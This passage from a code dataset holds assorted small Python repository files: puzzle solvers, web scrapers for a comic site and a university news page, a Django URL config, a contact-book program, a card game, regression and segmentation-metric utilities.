Do the following for every tried row.\n - If the queen can be placed safely in this row, then mark this [row, column] as part of the\n solution and recursively check if placing the queen here leads to a solution.\n - If placing the queen in [row, column] leads to a solution, return true.\n - If placing the queen in [row, column] doesn’t lead to a solution, then unmark this [row, column] \n and go to the first step to try other rows.\n - If all rows have been tried and nothing worked, return false to trigger backtracking.\n\n\n\n\"\"\"\n\nclass NQueens:\n\n def __init__(self, n) -> None:\n self.n = n\n self.chess_table =[[0 for i in range(n)] for j in range(n)]\n\n def print_queens(self):\n for i in range(self.n):\n for j in range(self.n):\n if self.chess_table[i][j] == 1:\n print(\" Q \", end=' ')\n else:\n print(\" - \", end=' ')\n print(\"\\n\")\n\n def is_place_safe(self, row_index, col_index):\n for i in range(self.n):\n if self.chess_table[row_index][i] ==1:\n return False\n\n j = col_index\n for i in range(row_index, -1, -1):\n if i < 0:\n break\n if self.chess_table[i][j] ==1:\n return False\n j = j -1\n \n j = col_index\n for i in range(row_index, self.n):\n if i < 0:\n break\n if self.chess_table[i][j] == 1:\n return False\n\n j = j -1\n\n return True\n\n def solve(self, col_index):\n if col_index == self.n:\n return True\n\n for row_index in range(self.n):\n if self.is_place_safe(row_index, col_index):\n self.chess_table[row_index][col_index] =1\n if self.solve(col_index+1):\n return True\n self.chess_table[row_index][col_index] = 0\n return False\n\n def solve_NQueens(self):\n if self.solve(0):\n self.print_queens()\n else:\n print(\"No solution exists for the problem\")\n\n\nqueens = NQueens(2)\nqueens.solve_NQueens()\n\n\n\n# q =NQueens(8)\n# print(q.chess_table)\n# print(\"gggggggggggggggggggg\")\n# q.print_queens()\n\nfrom typing import List\n\nclass Solution:\n\n def solveNQueens(self, n: int) ->List[List[str]]:\n col = set()\n posDiag =set() # (r + c)\n negDiag =set() # (r - c)\n\n res =[]\n board =[[\".\"] *n for i in range(n)]\n\n def backtrack(r):\n if r == n:\n copy =[\"\".join(row) for row in board]\n res.append(copy)\n return\n \n for c in range(n):\n if c in col or (r+c) in posDiag or (r-c) in negDiag:\n continue\n\n col.add(c)\n posDiag.add(r + c)\n negDiag.add(r-c)\n board[r][c] =\"Q\"\n\n backtrack(r +1)\n\n col.remove(c)\n posDiag.remove(r +c)\n negDiag.remove(r-c)\n board[r][c]=\".\"\n backtrack(0)\n return res\n\nsol =Solution()\nprint(sol.solveNQueens(4))\n","repo_name":"Chemokoren/Algorithms-1","sub_path":"Backtracking/n_queens.py","file_name":"n_queens.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"18965617335","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 23 17:19:25 2022\n\n@author: WILL LIU\n\"\"\"\nimport numpy as np\n\ndef genoja(X,Y,n,eta_1=0.0005,eta_2=0.005,iterations = False):\n '''\n Input:\n X,Y: data\n n: number of target components\n eta1,eta2: learning rate\n iterations: max iteration. 
If False, run all the points in dataset\n Output:\n a,b: canonical correlation components\n corr_list: correlation during the iterations\n '''\n \n #initialization and random starting value\n length,m = X.shape\n np.random.seed(999999999)\n V = np.random.randn(m*2,n)\n V,_ = np.linalg.qr(V, mode='reduced')\n U = np.random.randn(m*2,n)\n U,_ = np.linalg.qr(U, mode='reduced')\n\n #if iterations is not set, run all the samples in the dataset\n if iterations==False:\n max_iter = length//100\n else:\n max_iter = iterations//100\n corr_mat = np.zeros((max_iter,n))\n \n #iterations\n for j in range(max_iter):\n\n #store the result every 100 iterations\n for i in range(100):\n\n #initialize the cov matrices\n ind = j*100+i\n x = X[ind,:]\n y = Y[ind,:]\n c12 = np.outer(x,y)\n c11 = np.outer(x,x)\n c22 = np.outer(y,y)\n \n #initialize A\n A = np.zeros((m*2,m*2))\n A[:m,m:] = c12\n A[m:,:m] = c12.T\n \n #initialize B\n B = np.zeros((m*2,m*2))\n B[0:m,0:m] = c11\n B[m:m*2,m:m*2] = c22\n \n #two-step process\n U -= eta_2*(B@U-A@V)\n V += eta_1*U\n a = V[:m]\n a,r = np.linalg.qr(a, mode='reduced')\n a = a*np.sign(np.diagonal(r))#avoid switching sign in QR\n \n b = V[m:]\n b,r = np.linalg.qr(b, mode='reduced')\n b = b*np.sign(np.diagonal(r))#avoid switching sign in QR\n V[:m] = a\n V[m:] = b\n \n #record the result\n a = V[:m]\n b = V[m:]\n X_s = X@a\n Y_s = Y@b\n for k in range(n):\n corr_mat[j,k] = np.corrcoef(X_s.T,Y_s.T)[n+k,k]\n\n return a,b,corr_mat\n\n\nif __name__=='__main__':\n import matplotlib.pyplot as plt\n from sklearn.cross_decomposition import CCA\n\n #test on the sythetic data\n length = 50000\n l1 = np.random.normal(size=length)\n l2 = np.random.normal(size=length)\n l3 = np.random.normal(size=length)\n\n latents = np.array([l1, l1*0.5, l1*0.25, l2*0.7, l2*0.3, l3*0.5]).T\n X = latents + np.random.normal(size=6 * length).reshape((length, 6))*0.5\n Y = latents + np.random.normal(size=6 * length).reshape((length, 6))*0.5\n\n X = X-X.mean(axis=0)\n Y = Y-Y.mean(axis=0)\n\n #theoretical value\n n=3\n a,b,corr_list = genoja(X,Y,n,eta_1=0.0005,eta_2=0.005)\n cca = CCA(n_components=n)\n cca.fit(X, Y)\n X_c, Y_c = cca.transform(X, Y)\n \n for i in range(n):\n plt.plot(np.array(list(range(1,length//100+1)))*100,corr_list[:,i],label='streaming')\n plt.plot([100,50000],[np.corrcoef(X_c.T,Y_c.T)[n+i,i],np.corrcoef(X_c.T,Y_c.T)[n+i,i]],label='built-in')\n plt.xlabel('iterations')\n plt.ylabel('correlation')\n plt.legend()\n\n","repo_name":"WilliamLiu666/M4R_PCA","sub_path":"geneig.py","file_name":"geneig.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"31830491066","text":"def fact(x):\n\tif x == 0:\n\t\tresult = 1\n\telse:\n\t\tresult = x\n\t\tx -= 1\n\t\twhile x >= 1:\n\t\t\tresult *= x\n\t\t\tx -= 1\n\treturn result\n\ndef c(n,r):\n\treturn (fact(n))/(fact(r)*fact(n-r))\n\ndef pascal(a):\n\tans = []\n\tfor i in range(0,a+1):\n\t\tans.append(c(a,i))\n\treturn ans\n\n\n","repo_name":"burhanr13/python_code","sub_path":"pascaltriangle.py","file_name":"pascaltriangle.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"32266230788","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.urls import path\n\nfrom . 
import views\n\napp_name = \"vacancies\"\n\nurlpatterns = [\n path(\"vacancies/\", views.index, name=\"index\"),\n path(\"vacancies//\", views.vacancy_detail, name=\"vacancy_detail\"),\n path(\"vacancies//feedback/\", views.send_feedback, name=\"feedback\"),\n path(\"apl-feedback/\", views.feedback_list, name=\"applicant_feedback\"),\n path(\"del-apl-feedback//\", views.del_applicant_feedback, name=\"del_applicant_feedback\"),\n path(\"empl-feedback/\", views.employer_feedback_list, name=\"employer_feedback\"),\n path(\"create-vacancy/\", views.create_vacancy, name=\"create_vacancy\"),\n]\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"Talgatovich/vacancies_service","sub_path":"vacancies_project/vacancies/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"70429731952","text":"import re\nimport requests\nfrom bs4 import BeautifulSoup \nfrom fileinput import filename\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n'Accept-Encoding':'gzip, deflate, br',\n'Accept-Language': 'zh-CN,zh;q=0.9',\n'Cookie': 'PHPSESSID=10umpmsfnf32qcfcmed0c8ta72; Hm_lvt_ecb3501bb595c7329991bac49358921a=1578833673; UM_distinctid=16f99d1f9734e3-06babfedacc037-c383f64-1fa400-16f99d1f974b01; CNZZDATA1272815512=338166673-1578830842-%7C1578830842; Hm_lpvt_ecb3501bb595c7329991bac49358921a=1578835560'\n }\n\np1 = re.compile('16839/(.*?).html\"')\ndef get_url():\n with open('mh.html','r',encoding='utf-8') as f:\n fp = f.read()\n hh = re.findall(p1,fp)\n return hh\n\n\ndef get_con(id):\n html = requests.get('https://m.bnmanhua.com/comic/16839/'+ id +'.html',headers=headers)\n html.encoding=html.apparent_encoding\n ss=html.text\n return ss\n\np2 = re.compile(r\"16839(.*?).jpg\")\np3 = re.compile('斗罗大陆4终极斗罗漫画-(.*?)-全')\ndef get_img(tx):\n imgurl = re.findall(p2, tx)\n return imgurl\n \ndef get_title(tx):\n title = re.findall(p3,tx)\n return title\n\nurl = get_url()\n# com = get_con(url[2])\n# i = get_img(com)\nprint(len(url))\nprint(url[63])\n# o=i[1]\n# print(type(o))\nimport time\nfor j in range(64,len(url)):\n con = get_con(url[j])\n img = get_img(con)\n print(img)\n for i in range(len(img)):\n img[i].replace('\\\\','')\n url='https://img.yaoyaoliao.com/upload/files/16839'+img[i]+'.jpg'\n q=url.split('\\\\')\n url = q[0]+q[1]+q[2]\n res = requests.get(url=url)\n title = get_title(con)\n time.sleep(0.1)\n filename = 'D:\\\\HH\\\\%s_%s.jpg' % (title,str(i))\n w = open(filename,'wb')\n w.write(res.content)\n \n \n# url1.sort()\n# w = open('d6.txt','a',encoding='utf-8')\n# for id in url1:\n# id = str(id)\n# ss = get_con(id)\n# soup = BeautifulSoup(ss,'html.parser')\n# title = soup.find(name='div',id=\"title\").text\n# content = soup.find(name='div',id=\"content\").text\n# print(title)\n# wr=w.write(title)\n# w.write('\\n')\n# wr=w.write(content)\n# w.write('\\n')\n# w.close()\n","repo_name":"yzmbdays123/test","sub_path":"jingli_game/test_wemew/漫画.py","file_name":"漫画.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"22254392508","text":"def draw_board(board):\n \"\"\"\n Accepts a list of lists which makes up the board.\n 
Assumes the board is a list of rows. (See my_board)\n \"\"\"\n # Draw the column indexes.\n print(\" \", end=\"\")\n for index, col in enumerate(board):\n # Print the index of each column.\n # Note: sep=\"\", end=\"\" prevent python from creating a new line.\n print(\" C\" + str(index) + \" \", sep=\"\", end=\"\")\n print(\"\") # Creates a line break.\n for index, row in enumerate(board):\n # Print the row border.\n print(\" \" + (\"+----\" * 8) + \"+\", sep=\"\")\n # Print the row index.\n print(\"R\" + str(index) + \" \", sep=\"\", end=\"\")\n # Print each cell\n for cell in row:\n print(\"| \" + str(cell) + \" \", sep=\"\", end=\"\")\n print(\"|\") # Finishes the row.\n # Print the end border.\n print(\" \" + (\"+----\" * 8) + \"+\", sep=\"\")\n \nmy_board = [\n [\"br\", \"bk\", \"bb\", \"bq\", \"bk\", \"bb\", \"bk\", \"br\"],\n [\"bp\", \"bp\", \"bp\", \"bp\", \"bp\", \"bp\", \"bp\", \"bp\"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\"wp\", \"wp\", \"wp\", \"wp\", \"wp\", \"wp\", \"wp\", \"wp\"],\n [\"wr\", \"wk\", \"wb\", \"wq\", \"wk\", \"wb\", \"wk\", \"wr\"]\n]\n\nprint(my_board)\n# draw_board(my_board)","repo_name":"Hoverbear/SPARCS","sub_path":"week4/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"26208116691","text":"import requests\nimport re\nfrom bs4 import BeautifulSoup\nimport json\nimport random\n\nurl = \"https://news.tsinghua.edu.cn/tsqh.htm\"\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'}\npath = \"D:/picNews.json\"\n\n\ndef get_page():\n session = requests.session()\n res = session.get(url, headers=headers, timeout=2)\n res.encoding = 'utf-8'\n page = res.text\n return page\n\n\ndef rep(strs):\n suffix = \"?/|\\.><:*\"\n for s in suffix:\n if s in strs:\n strs = strs.replace(s, \"\") # fix: str.replace returns a new string\n return strs\n\n# picwhitenewslist\ndef parse_html(html):\n soup = BeautifulSoup(html, \"html.parser\")\n all_list = []\n for li in soup.find_all(\"figure\"):\n # get the image URL\n img = li.find(\"img\")\n if img:\n img = \"https://news.tsinghua.edu.cn/\" + img[\"src\"]\n # get the title\n title = li.select(\"a.jiequ\")\n if title:\n title = rep(title[0].string)\n else:\n continue\n # get the creation time\n time = li.select(\"i.thunews-clock-o\")\n if time:\n time = time[0].next_element\n # generate a random view count\n view = random.randint(800,8000)\n all_obj = {\n \"img\": img,\n \"title\": title,\n \"time\": time,\n \"view\" : view,\n }\n all_list.append(all_obj)\n print(all_list)\n return all_list\n\nhtml = get_page()\nlists = parse_html(html)\n# write the JSON file\nwith open(path, 'w', encoding='utf-8') as writer:\n json.dump(lists, writer, ensure_ascii=False, indent=2)\n","repo_name":"llwodexue/tsinghua_news","sub_path":"get_tsinghua.py","file_name":"get_tsinghua.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"14578496174","text":"import pytest\nimport yaml\nfrom elements.excel_data import ExcelData\nfrom utils.api import ApiMethods\n\nclass TestLogin:\n \n #parse yaml file\n with open(\"api.yaml\", \"r\") as stream:\n try:\n data = yaml.safe_load(stream)\n except yaml.YAMLError as e:\n print(e)\n #parse xlsx 
file\n data = ExcelData(\"api\")\n\n\n\n apiTrain = ApiMethods(data)\n\n @pytest.mark.parametrize(('data_dict', 'path_dict', 'assert_dict'), data.list_data, ids=data.list_desc)\n def test_1(self, data_dict, path_dict, assert_dict):\n\n # 'url' was undefined in the original test; assuming (hypothetically) that\n # the parametrized path data carries the request URL under a 'url' key:\n url = path_dict.get('url')\n res = self.apiTrain.get(url)\n data = res.get('data')\n assert data is not None","repo_name":"abc12345131/Jenkins-pytest-allure-pipeline","sub_path":"test demo/TestCase/test_login.py","file_name":"test_login.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"24143743501","text":"import numpy as np\nimport pandas as pd\nimport scipy.stats\n\n\nclass LinearRegression:\n \"\"\" Compute the linear regression of two variables\n\n Parameters\n ----------\n x, y: array-like or str\n these must be array-like of numeric with equal length\n or refer to keys for numeric variables in a dataframe-like object\n data: dataframe-like or None; default=None\n If provided, 'x' and 'y' are used as column indexes in data\n drop_na: bool; default=True\n If true, cases with nan values are excluded\n\n Attributes\n ----------\n data: pd.DataFrame\n data used for computing linear regression \n m, b, r, p, e: numeric\n outputs of scipy.stats.linregress\n x_pred, y_pred: np.ndarray\n coordinates for line of best fit\n x_label, y_label: str\n labels for x and y variables\n \"\"\"\n\n def __repr__(self):\n return f\"x={self.x_label} & y={self.y_label}; y'={self.m}x+{self.b}; r={self.r}, p={self.p}\"\n\n def __init__(self, x, y, data=None, drop_na=True, x_pred=None):\n if data is None:\n self.data = pd.DataFrame({\"x\": x, \"y\": y})\n x, y = \"x\", \"y\"\n else:\n self.data = data\n\n self.x_label, self.y_label = x, y\n\n if drop_na:\n self.data = self.data.loc[:, [x, y]].dropna()\n elif self.data.loc[:, [x, y]].isna().any(None):\n raise ValueError(\n \"Data contains NaN values and drop_na has been set to False.\"\n )\n\n self.m, self.b, self.r, self.p, self.e = scipy.stats.linregress(\n self.data[x], self.data[y]\n )\n\n if x_pred is None:\n self.x_pred = np.array([self.data[x].min(), self.data[x].max()])\n else:\n self.x_pred = x_pred\n self.y_pred = self.m * self.x_pred + self.b\n\n def to_series(self):\n return pd.Series(\n {\"m\": self.m, \"b\": self.b, \"r\": self.r, \"p\": self.p, \"e\": self.e}\n )\n
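\n\n# Hedged usage sketch (added for illustration; not part of the original module).\n# The column names 'height' and 'weight' are made up:\nif __name__ == '__main__':\n df = pd.DataFrame({'height': [1.60, 1.70, 1.80], 'weight': [60.0, 66.0, 73.0]})\n fit = LinearRegression('height', 'weight', data=df)\n print(fit) # slope m, intercept b, r and p\n print(fit.to_series())\n","repo_name":"jselvan/simianpy","sub_path":"simianpy/analysis/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"35252773627","text":"file_handle = open ('agenda.txt', 'w')\nagenda = [] \n\ndef i_nome(): \n return(input(\"Nome: \"))\n\n\ndef i_telefone():\n return(input(\"Telefone: \"))\n\n\ndef i_email(): \n return(input(\"Email: \"))\n\n\ndef listar_dados(nome, telefone, email): \n print(\"Nome: %s\\nTelefone: %s\\nEmail: %s\" % (nome, telefone, email))\n\n\ndef pesquisa(nome): \n name = nome.lower() \n for d, e in enumerate(agenda):\n if (e[0].lower() == name): \n return d \n return None \n\ndef novo(): \n global agenda \n nome = i_nome() \n telefone = i_telefone()\n email = i_email() \n agenda.append([nome, telefone, email])\n\ndef apagar(): \n global agenda\n nome = i_nome()\n p = pesquisa(nome)\n if (p != None): \n del agenda[p] \n else:\n print(\"Nome não encontrado.\")\n\n\ndef editar(): \n p = pesquisa(i_nome()) \n if (p != None): \n nome = agenda[p][0] \n telefone = agenda[p][1] \n email = agenda[p][2]\n \n 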
print(\"\\n **** Encontrado **** \\n\")\n \n listar_dados(nome, telefone, email) \n nome = i_nome() \n telefone = i_telefone() \n email = i_email() \n agenda[p] = [nome, telefone, email] \n else:\n print(\"Nome não encontrado!\")\n\n\n\ndef listar():\n \n print(\"\\n*************************** \\n \\tAgenda\\n\\n***************************\")\n\n file_handle = open ('agenda.txt', 'a')\n file_handle.write(str(agenda))\n \n for coisa in agenda:\n file_handle = open ('agenda.txt', 'r')\n file_handle.readlines()\n print(listar_dados(coisa[0], coisa[1], coisa[2]) , '\\n')\n return ' '\n print(\"***************************\\n\")\n \n\nfile_handle.close()\n\ndef pesquisar(): \n p = pesquisa(i_nome()) \n if (p != None): \n nome = agenda[p][0] \n telefone = agenda[p][1] \n email = agenda[p][2] \n print(\"\\n **** Encontrado **** \\n\") \n listar_dados(nome, telefone, email) \n else:\n print(\"Nome não encontrado!\") \n\ndef validar(pergunta, inicio, fim): \n while True: \n try: \n valor = int(input(pergunta)) \n if (inicio <= valor <= fim): \n return(valor) \n \n except ValueError: \n print(\"Valor inválido, favor digitar entre %d e %d\" % (inicio, fim))\n\ndef menu(): \n print(\"\"\"\n 1 - Novo contato\n 2 - Editar um contato\n 3 - Pesquisar contato\n 4 - Todos os Contatos\n 5 - Apagar um contato\n 6 - Sair\n\"\"\")\n \n return validar(\"Escolha uma opção: \",1,6) \n\n\nwhile (True): \n opção = menu()\n if (opção == 6): \n break\n elif (opção == 1):\n novo()\n elif (opção == 2):\n editar()\n elif (opção == 3):\n pesquisar()\n elif (opção == 4):\n listar()\n elif (opção == 5):\n apagar()\n\n \n#desenvolvido por Adrielle Alves & Adnaelle Alves\n#Trabalho de FuP\n# #MeDáUm10\n# #EmNomeDeJesus\n# #É_Serio\n","repo_name":"bomdya/agenda.py","sub_path":"agendacontatos.py","file_name":"agendacontatos.py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"12914548329","text":"\"\"\"Algorithm of total inversion (Tarantola and Valette, 1982).\"\"\"\nimport numpy as np\n\nfrom src.modelequations import evaluate_model_equations\n\n\ndef calculate_xkp1(Co, xo, xk, f, F):\n \"\"\"Calculate an estimate of the state vector.\"\"\n\n Args:\n Co (np.ndarray): Error covariance matrix of prior estimates.\n xo (np.ndarray): State vector of prior estimates.\n xk (np.ndarray): State vector of estimates at the beginning of an\n iteration, k.\n f (np.ndarray): Vector of functions containing the model equations.\n F (np.ndarray): The Jacobian matrix.\n\n Returns:\n xkp1 (np.ndarray): State vector of new estimates produced after\n iteration k.\n CoFT, FCoFTi (np.ndarray): Matrix products used in subsequent steps.\n \"\"\"\n CoFT = Co @ F.T\n FCoFT = F @ CoFT\n FCoFTi = np.linalg.inv(FCoFT)\n xkp1 = xo + CoFT @ FCoFTi @ (F @ (xk - xo) - f)\n\n return xkp1, CoFT, FCoFTi\n\n\ndef check_convergence(xk, xkp1):\n \"\"\"Check if the model has converged.\n\n Args:\n xk (np.ndarray): State vector of estimates at the beginning of an\n iteration, k.\n xkp1 (np.ndarray): State vector of new estimates produced after\n iteration k.\n\n Returns:\n converged (bool): True if model converged.\n max_change (float): The magnitude of the largest change in a single\n state element before and after iteration k.\n \"\"\"\n converged = False\n max_change_limit = 10**-6\n change = np.abs((xkp1 - xk) / xk)\n max_change = np.max(change)\n\n if max_change < max_change_limit:\n converged = True\n\n return converged, max_change\n\n\ndef calculate_cost(Co, 
xo, x):\n \"\"\"Evaluate the cost function given an estimate of the state vector, x\"\"\"\n cost = (x - xo).T @ np.linalg.inv(Co) @ (x - xo)\n\n return cost\n\n\ndef find_solution(equation_elements, state_elements, xo, Co, grid, zg,\n umz_start, mld=None, soft_constraint=False):\n \"\"\"An iterative approach for finding a solution to a nonlinear system.\n\n Args:\n state_elements (list[str]): Names of state elements.\n equation_elements (list[str]): Names of state elements that have\n associated equations (i.e., the tracers).\n xo (np.ndarray): State vector of prior estimates.\n Co (np.ndarray): Error covariance matrix of prior estimates.\n grid (list[float]): The model grid.\n zg (float): The maximum grazing depth, also the base of the euphotic\n zone.\n umz_start (int): Index of grid which corresponds to the depth of the\n base of the first layer in the upper mesopelagic zone.\n mld (float): Mixed layer depth.\n\n Returns:\n xhat (np.ndarray): Estimate of the state vector produced once the model\n has converged (i.e., the solution).\n Ckp1 (np.ndarray): Error covariance matrix of posterior estimates.\n convergence_evolution (list): A history of the magnitude of the\n maximum elementwise change in the state vector before and after an\n iteration.\n cost_evolution (list): A history of the cost.\n converged (bool): True if model converged.\n \"\"\"\n max_iterations = 50\n convergence_evolution = []\n cost_evolution = []\n xhat = np.full(xo.shape, -9999)\n Ckp1 = np.full(Co.shape, -9999)\n\n xk = xo\n xkp1 = np.ones(len(xk)) # at iteration k+1\n for count in range(max_iterations):\n f, F = evaluate_model_equations(\n equation_elements, xk, grid, zg, umz_start, mld,\n state_elements=state_elements, soft_constraint=soft_constraint)\n\n xkp1, CoFT, FCoFTi = calculate_xkp1(Co, xo, xk, f, F)\n cost = calculate_cost(Co, xo, xkp1)\n\n cost_evolution.append(cost)\n if count > 0: # xk contains 0's for residuals when k=0\n converged, max_change = check_convergence(xk, xkp1)\n convergence_evolution.append(max_change)\n if converged:\n Ckp1 = Co - CoFT @ FCoFTi @ F @ Co\n xhat = xkp1\n break\n xk = xkp1\n\n return xhat, Ckp1, convergence_evolution, cost_evolution, converged\n\n\ndef normalized_state_residuals(xhat, xo, Co):\n \"\"\"Calculate residuals of state estimates relative to prior estimates.\"\"\"\n x_resids = list((xhat - xo) / np.sqrt(np.diag(Co)))\n\n return x_resids\n\n\ndef success_check(converged, state_elements, xhat, Ckp1, zg):\n \"\"\"Check for negative concentrations and model parameters in a solution.\"\"\"\n if not converged:\n return False\n \n indexes = [i for i, s in enumerate(state_elements) if 'R' not in s]\n nonresidual_estimates = [xhat[i] for i in indexes]\n negative_estimates = any(i < 0 for i in nonresidual_estimates)\n if negative_estimates:\n return False\n \n variances = np.diag(Ckp1)\n nonresidual_variances = [variances[i] for i in indexes]\n negative_variances = any(i < 0 for i in nonresidual_variances)\n if negative_variances:\n return False\n \n zm = xhat[state_elements.index('zm')]\n if zm < zg:\n return False\n\n return True\n","repo_name":"amaralvin7/pyrite","sub_path":"src/ati.py","file_name":"ati.py","file_ext":"py","file_size_in_byte":5078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"23791426069","text":"from Player import Player\nfrom Deck import Deck\n\ndec = Deck()\ndec.shuffle()\n(firstDeck, secondDeck) = dec.provide_deck()\n\nfirstPlayer = Player(firstDeck)\nsecondPlayer = 
Player(secondDeck)\n\nisContinuePlay = True\npileCards = []\nturn = 0\nwhile isContinuePlay:\n firstPlayerCard = firstPlayer.pop()\n secondPlayerCard = secondPlayer.pop()\n print(f'[{turn}] firstPlayerCard: {firstPlayerCard}')\n print(f'[{turn}] secondPlayerCard: {secondPlayerCard}')\n\n pileCards.append(firstPlayerCard)\n pileCards.append(secondPlayerCard)\n if firstPlayerCard.rank.value == secondPlayerCard.rank.value:\n print('Draw')\n pileCards.extend(firstPlayer.draw())\n pileCards.extend(secondPlayer.draw())\n elif firstPlayerCard.rank.value < secondPlayerCard.rank.value:\n print(f'secondPlayer is win, has {len(pileCards)} cards')\n secondPlayer.win(pileCards)\n pileCards = []\n else:\n print(f'firstPlayer is win, has {len(pileCards)} cards')\n firstPlayer.win(pileCards)\n pileCards = []\n\n print(f'[{turn}] {firstPlayer} isLose: {firstPlayer.isLose()}')\n print(f'[{turn}] {secondPlayer} isLose: {secondPlayer.isLose()}')\n turn = turn + 1\n isContinuePlay = not (firstPlayer.isLose() or secondPlayer.isLose())\n","repo_name":"yongju-jin/wargame","sub_path":"WarGame.py","file_name":"WarGame.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"30725942253","text":"import colors\n\nscreen_width = 1000\nscreen_height = 600\nbackground_image = 'images/background.jpg'\n\nframe_rate = 50\n\nrow_count = 6\nbrick_width = 60\nbrick_height = 20\nbrick_color = colors.RED1\noffset_y = brick_height + 10\n\nball_speed = 3\nball_radius = 8\nball_color = colors.GREEN\n\npaddle_width = 80\npaddle_height = 20\npaddle_color = colors.ALICEBLUE\npaddle_speed = 6\n\nstatus_offset_y = 5\n\ntext_color = colors.YELLOW1\ninitial_lives = 3\nlives_right_offset = 85\nlives_offset = screen_width - lives_right_offset\nscore_offset = 5\n\nfont_name = 'Tahoma'\nfont_size = 15\n\neffect_duration = 20\n\nround_time = 20\n\nbutton_pictures = {\n 'PLAY': 'images/Play.png',\n 'QUIT': 'images/Quit.png',\n 'GUN': 'images/Gun.png',\n 'BAZUKA': 'images/Bazuka.png',\n 'WIN_1': 'images/images/Winner_1.png',\n 'WIN_2': 'images/images/Winner_2.png'\n}\nmessage_duration = 1\n\nbutton_text_color = colors.WHITE,\nbutton_normal_back_color = colors.INDIANRED1\nbutton_hover_back_color = colors.INDIANRED2\nbutton_pressed_back_color = colors.INDIANRED3\n\nmenu_button_w = 60\nmenu_button_h = 40\nmenu_offset_y = 20\nmenu_offset_x = screen_width-menu_button_w-menu_offset_y\n\nsprite_width =20\nsprite_height =20\nground_image = 'images/ground.png'\nworm_image_1 = 'images/worm1.png'\nworm_image_2 = 'images/worm2.png'\nplayer_image_1 = 'images/Player1.png'\nplayer_image_2 = 'images/Player2.png'\ngun_image='images/G.png'\nbullet_image='images/Bullet.png'\ngun2_image='images/B.png'\nbullet2_image='images/Gr.png'\n\n","repo_name":"Bcrfntkm/Final-Project","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"5585177953","text":"import numpy as np\nimport cv2\n\n\ndef dice_coeff_kaggle(y_pred, y_true):\n '''Dice Coefficient metric as defined in the Kaggle competition.\n '''\n dice_scores = per_class_dice_coeff(y_pred, y_true)\n return np.mean(dice_scores)\n\ndef per_class_dice_coeff(y_pred, y_true):\n y_pred = np.where(y_pred > 0.5, 1, 0)\n\n dice_scores = []\n for i in range(y_pred.shape[-1]):\n y_pred_sum = np.sum(y_pred[:, :, i])\n y_true_sum = np.sum(y_true[:, :, i])\n if y_pred_sum == 0 and y_true_sum 
== 0:\n dice_scores.append(1.0)\n continue\n intersection = np.sum(y_pred[:, :, i] * y_true[:, :, i])\n dice_scores.append(\n 2 * intersection / (y_pred_sum + y_true_sum))\n return np.array(dice_scores)\n\n\ndef rle_to_dense(rle, img_height, img_width):\n '''Convert the rle representation of a single class mask to the equivalent dense binary np\n array.\n '''\n if rle is None or rle == '':\n return np.zeros((img_height, img_width), dtype=np.uint8)\n rle_list = rle.strip().split(' ')\n rle_pairs = [(int(rle_list[i]), int(rle_list[i+1])) for i in range(0, len(rle_list), 2)]\n\n dense_1d_array = np.zeros(img_height * img_width, dtype=np.uint8)\n for rle_start, rle_run in rle_pairs:\n # Subtract 1 from indices because pixel indices start at 1 rather than 0\n dense_1d_array[rle_start - 1:rle_start + rle_run - 1] = 1\n \n # Use Fortran ordering, meaning that the first index changes fastest (sort of unconventional)\n dense_2d_array = np.reshape(dense_1d_array, (img_height, img_width), order='F')\n return dense_2d_array\n\n\ndef dense_to_rle(dense):\n '''Convert the dense np ndarray representation of a single class mask to the equivalent rle\n representation.\n '''\n assert len(dense.shape) == 2\n # Use Fortran (column-major) ordering\n pixels = dense.flatten(order='F')\n pixels = np.concatenate([[0], pixels, [0]])\n runs = np.where(pixels[1:] != pixels[:-1])[0] + 1\n runs[1::2] -= runs[::2]\n return ' '.join(str(x) for x in runs)\n\n\ndef 